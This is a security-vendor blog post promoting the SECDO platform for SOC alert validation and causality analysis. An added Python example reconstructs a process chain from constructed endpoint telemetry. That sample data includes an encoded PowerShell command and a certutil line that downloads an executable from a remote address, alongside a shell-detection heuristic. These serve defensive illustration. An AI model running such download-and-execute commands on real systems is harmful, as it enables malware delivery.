A Day in the Life of the SOC... Then and Now
Once upon a time, life in the Security Operations Center was hard. Fortunately, times have changed.
Not so long ago, analysts spent long hours every day poring over hundreds of alerts, trying to decide which ones were serious and which ones were false positives. They manually collected endpoint and server data to see the full context of an alert, and wrote dozens of complex queries to find the information they needed in the sea of events. The most skilled hunters and investigators then worked long and hard to figure out what it all meant: to identify the root cause, prepare a detailed forensic analysis of the impact, and put it right. And all of this had to be done over, and over, and over again. The headache was far larger for MSSPs and other service providers juggling multiple customers and tough SLAs for response time.
Before we started SECDO, we took a good look at life in the SOC and came up with our own list of reasons why hunting and investigating threats takes so long:
- There’s no simple way to validate alerts
- There is not nearly enough endpoint and server visibility to validate alerts or investigate incidents
- There is no easy way to search and analyze information once you collect it
- Analytics tools, when available, are not designed to identify root cause, and the cause and effect chain of an attack. You have to figure it out yourself.
- There is no automated solution that maps the impact of an incident and helps you to clean it up
We knew that if we checked off every item on this list, we could really make a difference in the daily life of a security analyst. And, a year later...
The SECDO platform is disrupting a day in the life of the SOC. SECDO continuously collects the most detailed, thread-level endpoint activity and correlates it with third-party alerts via the SIEM. With a revolutionary Causality Analytics technology, SECDO not only identifies suspicious behaviors – it shows you the forensic timeline for every behavior from the root cause onward.
SECDO’s unique, narrative approach to hunting and investigation visualizes the cause and effect between every event and alert in the organization. It instantly reveals the full story behind any alert or suspicious event – the “who, what, where, when, how and why.”
With automatic Alert Validation, SECDO saves countless hours by flagging every false positive and letting you drill down on the genuine alerts with a single click. SECDO’s visual search engine replaces hundreds or even thousands of textual queries with a simple, drag and drop interface. Last but not least, the SECDO platform reveals the impact of any incident, across all of the endpoints and servers involved, so you can quickly perform forensic analysis, report fully, and remediate fast.
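To make the ideas above concrete (walking an alert back to its root cause, enumerating the processes it spawned, and using the resulting chain to validate the alert), here is a small added illustration. It is not SECDO's code and says nothing about how the SECDO platform is implemented; the process-event schema, the SIEM alert, the sample endpoint telemetry and the Office-app-spawns-shell validation rule are all constructed for the example.

```python
"""Added illustration of causality analysis on endpoint process events.

Not SECDO's code. The event schema, sample telemetry, alert and the
validation heuristic are all constructed for this example.
"""
from collections import defaultdict

# Constructed endpoint telemetry: one record per process start.
# Fields: pid, ppid, image, cmdline, ts (seconds since start of capture), host.
EVENTS = [
    dict(pid=100, ppid=1,   image="explorer.exe",   cmdline="explorer.exe", ts=0, host="ws01"),
    dict(pid=210, ppid=100, image="outlook.exe",    cmdline="outlook.exe", ts=5, host="ws01"),
    dict(pid=320, ppid=210, image="winword.exe",    cmdline='winword.exe /q "invoice.docm"', ts=12, host="ws01"),
    dict(pid=430, ppid=320, image="powershell.exe", cmdline="powershell -enc SQBFAFgA...", ts=13, host="ws01"),
    dict(pid=540, ppid=430, image="cmd.exe",        cmdline="cmd /c whoami", ts=14, host="ws01"),
    dict(pid=550, ppid=430, image="certutil.exe",   cmdline="certutil -urlcache -f http://203.0.113.5/a.exe c:\\temp\\a.exe", ts=15, host="ws01"),
    dict(pid=660, ppid=550, image="a.exe",          cmdline="c:\\temp\\a.exe", ts=20, host="ws01"),
    dict(pid=700, ppid=100, image="chrome.exe",     cmdline="chrome.exe", ts=30, host="ws01"),
]

# Constructed third-party (SIEM) alert that points at a process by host and pid.
ALERT = dict(rule="Encoded PowerShell command line", host="ws01", pid=430, ts=13)

# Hypothetical validation knowledge: an Office application with a scripting
# shell somewhere below it in the process chain is a classic sign of a
# malicious document, so such alerts are treated as genuine rather than noise.
OFFICE_APPS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
SHELLS = {"powershell.exe", "cmd.exe", "wscript.exe", "cscript.exe", "mshta.exe"}


def build_index(events):
    """Index events by (host, pid) and build a (host, ppid) -> children map."""
    by_key = {(e["host"], e["pid"]): e for e in events}
    children = defaultdict(list)
    for e in events:
        children[(e["host"], e["ppid"])].append(e)
    return by_key, children


def root_cause_chain(events, host, pid):
    """Walk parent links from the alerted process up to the earliest ancestor
    we have telemetry for. Returns the chain oldest-ancestor-first."""
    by_key, _ = build_index(events)
    chain, seen, key = [], set(), (host, pid)
    while key in by_key and key not in seen:  # 'seen' guards against pid reuse loops
        seen.add(key)
        e = by_key[key]
        chain.append(e)
        key = (host, e["ppid"])
    chain.reverse()
    return chain


def impact(events, host, pid):
    """Every descendant of the alerted process, in start order per parent:
    the blast radius an analyst has to examine and clean up."""
    _, children = build_index(events)
    out, stack = [], [(host, pid)]
    while stack:
        key = stack.pop()
        for c in sorted(children.get(key, []), key=lambda e: e["ts"]):
            out.append(c)
            stack.append((c["host"], c["pid"]))
    return out


def validate(chain):
    """Alert validation on the causal chain: 'genuine' if an Office app is an
    ancestor of a scripting shell, otherwise 'needs-review'."""
    images = [e["image"].lower() for e in chain]
    for i, img in enumerate(images):
        if img in OFFICE_APPS and any(s in SHELLS for s in images[i + 1:]):
            return "genuine"
    return "needs-review"


def timeline(chain, descendants):
    """Forensic timeline: root cause first, then everything it led to."""
    rows = sorted(chain + descendants, key=lambda e: e["ts"])
    return [f'{e["ts"]:>3}s pid={e["pid"]} ppid={e["ppid"]} {e["cmdline"]}' for e in rows]


if __name__ == "__main__":
    chain = root_cause_chain(EVENTS, ALERT["host"], ALERT["pid"])
    kids = impact(EVENTS, ALERT["host"], ALERT["pid"])
    print(f'alert "{ALERT["rule"]}" verdict: {validate(chain)}')
    for line in timeline(chain, kids):
        print(line)
```

Run as a script it prints the verdict for the constructed alert and the combined timeline, from explorer.exe through the Office document, the encoded PowerShell, the certutil download and the dropped binary. A second alert on the chrome.exe process (pid 700) walks back only to explorer.exe, has no descendants, and lands in "needs-review", which is the kind of distinction that lets an analyst drop a false positive without hand-collecting the endpoint data first.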